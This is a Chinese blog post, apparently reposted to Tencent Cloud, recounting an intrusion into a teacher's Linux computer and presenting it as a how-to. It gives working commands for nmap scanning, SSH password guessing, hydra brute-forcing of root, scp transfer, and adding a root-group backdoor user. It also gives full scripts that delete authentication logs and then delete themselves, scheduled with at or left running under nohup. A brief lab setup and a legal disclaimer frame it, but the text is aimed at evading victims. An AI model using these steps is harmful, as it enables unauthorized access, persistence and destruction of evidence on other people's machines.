前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >记一次入侵老师电脑的回顾与总结

记一次入侵老师电脑的回顾与总结

作者头像
公众号爱国小白帽
发布2020-11-19 16:40:50
1.3K0
发布2020-11-19 16:40:50
举报
文章被收录于专栏:爱国小白帽的原创专栏

关注一下,更多精彩等着你!

声明:本文介绍的技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可传播使用相关技术及工具从事违法犯罪行为,一经发现直接上报国家安全机关处理

我的CSDN铁杆粉都知道,下面这条动态是我刚刚进入这个社区时发的,当时还小火了一把,下面有原图

之后我不负众望写了下面这篇文章,然后我便在几天之内收获了900多的粉丝,在这里感谢大家的支持与厚爱,让我们互相帮助、携手共进吧!下面请欣赏原文

入侵流程

准备好清除痕迹的shell脚本?扫描在线的IP?扫描IP22端口?尝试连接?传输shell脚本?正式入侵?执行shell脚本?完成你想要的操作?华丽退出✌欧耶

啥也不知道的

扫描IP

暴力破解

知道用户名密码直接连

成功入侵

☛点我一键到底☚

实验准备:

  • 虚拟机
  • 两台linux系统(一台做入侵机一台做受害机)
  • 两台机子都用NAT模式连接局域网
  • 创建shell脚本,用于清除你的入侵痕迹
  • 弱口令密码字典

点开虚拟机的设置(也可以Ctrl+D)然后找到网络适配器,选择NAT模式

/var/www/目录下创建shell脚本,命令:vi /var/www/shell.sh

普通脚本内容:

代码语言:javascript
复制
#!/bin/bash
rm /var/log/secure
echo y
rm /var/log/wtmp
echo y
rm /var/log/utmp
echo y
rm /var/log/btmp
echo y
rm /var/log/messages
echo y
rm /var/spool/mail/root
echo y
rm -- "$0"

自动化脚本内容: 注意这里的IP换成你自己的

代码语言:javascript
复制
#!/bin/bash
readonly your_ip="192.168.70.146"
if [ $(w | grep -c $your_ip) -gt 0 ];
	then
	sleep 5m
	cd /var/www/ && ./shell.sh
else
	rm /var/log/secure
	echo y
	rm /var/log/wtmp
	echo y
	rm /var/log/utmp
	echo y
	rm /var/log/btmp
	echo y
	rm /var/log/messages
	echo y
	rm /var/spool/mail/root
	echo y
	rm -- "$0"
fi

然后添加执行权限

代码语言:javascript
复制
chmod +x /var/www/shell.sh

入侵开始:扫描IP阶段

1、首先查看本机IP在什么网段,如图在192.168.70.0网段

2、然后使用namp扫描此网段存在的主机,如:namp -sP 192.168.70.0/24发现了两个目标

3、用namp -p22 192.168.70.xxx命令扫描目标机的22端口,如果ssh端口开启便可以尝试连接了

入侵情况一:你知道对方使用的用户名,并且能猜到密码

现在就要把脚本准备好,入侵成功后第一时间把脚本放进去,否则对方一旦关机下线,你就什么也做不了了,会留下入侵痕迹,很危险

1、使用ssh a@192.168.70.141命令连接开启ssh的IP,注意这里输入的密码是没有显示的,你输完敲回车就行了

我试验的用户名是a,试了密码123456但是没进去,它让再输一次,我输入456789就成功了,进去之后会有个中括号把用户名括起来。

注意:此时你一定要确认用户名正确,大小写都不能错,因为就算没有这个用户也会提示你输入密码,然后你就会不断地尝试进入根本不存在的用户,最后自闭了,这个时候你可千万别找我,我好心提醒过你了

第一次连接会问你是否继续,输入yes回车就可以了,密码最多尝试三次,断开之后重新连就行了

2、你可以输入wwhowhoami确定一下成功没,在用户名后面会显示出你的IP,如图:

3、你也可以ifconfig查看一下IP变化

4、这是受害者的那台电脑,就算他开着终端也不会有任何变化,完全不知道你进来了

警告:进去之后千万别乱动:1.可能引起受害者的注意,人家一查当前登录用户就能知道你的IP。2.你是最高权限,搞坏系统,删除数据无所不能。所以为了自己的后半生随便看看得了。

入侵情况二:你不知道对方使用的用户名

方法1:使用ssh 192.168.70.141命令连接开启ssh的IP

此时默认登录的root用户,默认密码是123456,一旦你登进去就是最高权限了,想干嘛干嘛

第一次登录会问你确定连接么,输入yes回车就可以了

方法2:使用暴力破解工具

使用kali自带的hydra进行暴力破解,首先创建一个密码字典,内容可以自己写,也可以复制一下其他地方的弱口令密码然后就可以执行下列命令了

代码语言:javascript
复制
hydra -l root -P pwd.dic -t 1 -vV -e ns 192.168.70.141 ssh

可以看到正确密码很明显的显示出来了,但是现在别急着连接

密码爆破成功后

1、把事先准备好的shell脚本传过去,这是在没有连接的情况下,命令如下:

代码语言:javascript
复制
scp /var/www/shell.sh root@192.168.70.141:/var/www/

这样的显示基本上就成功了

在确认一下,可以看到已经传过来了

2、脚本传过去之后就可以连接了

连接上之后你最好再确认一下,然后你就可以想干嘛干嘛了

比如看看他的密码文件

或者创建个root权限的用户,方便下次入侵useradd superman -g root -p 123.com 再或者输出一句话给他个惊喜

痕迹消除

使用普通脚本

有时可能你还没来得及退出对方就关机了,这时你的终端就不能动了,所以最好一连接上对方服务器你就制定好计划任务来执行脚本文件,如下:

直接输入命令at now +3 minutes然后再手动输入cd /var/www/ && ./shell.shCtrl+D退出即可,如下: 注意:手动输入时不能删除,要一次性输入成功,然后按Ctrl+D,如果出错就重新来一遍

代码语言:javascript
复制
[root@a ~]# at now +3 minutes	 #执行at并指定执行时刻为现在时间的后两分钟
at> cd /var/www/ && ./shell.sh   #手动输入命令并回车
at> <EOT>						 #Ctrl+D结束输入
job 1 at 2020-02-29 18:07		 #显示的任务号及执行时间
[root@a ~]#

如果你连接上就立马定时任务的话,可以将时间定的久一点,千万不要超时退出,否则这个脚本就失效了

使用自动化脚本

使用这个脚本也是最好连接上对方你就开始执行,好处是执行完你就不必担心了,它每五分钟自动检测一次连接状态,当你退出后它检测不到你的IP就会自动执行删除计划,使用方法如下:

输入nohup ./shell.sh &将脚本隐藏在后台运行,可以输入ps -ef | grep shell.sh查看进程

受害方也能看到此进程

隐藏在后台的脚本不会影响你退出

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-06-06,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 爱国小白帽 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 入侵流程
  • ☛点我一键到底☚
  • 实验准备:
  • 入侵开始:扫描IP阶段
    • 1、首先查看本机IP在什么网段,如图在192.168.70.0网段
      • 2、然后使用namp扫描此网段存在的主机,如:namp -sP 192.168.70.0/24发现了两个目标
        • 3、用namp -p22 192.168.70.xxx命令扫描目标机的22端口,如果ssh端口开启便可以尝试连接了
        • 入侵情况一:你知道对方使用的用户名,并且能猜到密码
          • 1、使用ssh a@192.168.70.141命令连接开启ssh的IP,注意这里输入的密码是没有显示的,你输完敲回车就行了
            • 2、你可以输入w或who或whoami确定一下成功没,在用户名后面会显示出你的IP,如图:
              • 3、你也可以ifconfig查看一下IP变化
                • 4、这是受害者的那台电脑,就算他开着终端也不会有任何变化,完全不知道你进来了
                • 入侵情况二:你不知道对方使用的用户名
                  • 方法1:使用ssh 192.168.70.141命令连接开启ssh的IP
                    • 方法2:使用暴力破解工具
                      • 使用kali自带的hydra进行暴力破解,首先创建一个密码字典,内容可以自己写,也可以复制一下其他地方的弱口令密码然后就可以执行下列命令了
                  • 密码爆破成功后
                    • 1、把事先准备好的shell脚本传过去,这是在没有连接的情况下,命令如下:
                      • 2、脚本传过去之后就可以连接了
                      • 痕迹消除
                        • 使用普通脚本
                          • 使用自动化脚本
                          领券
                          问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档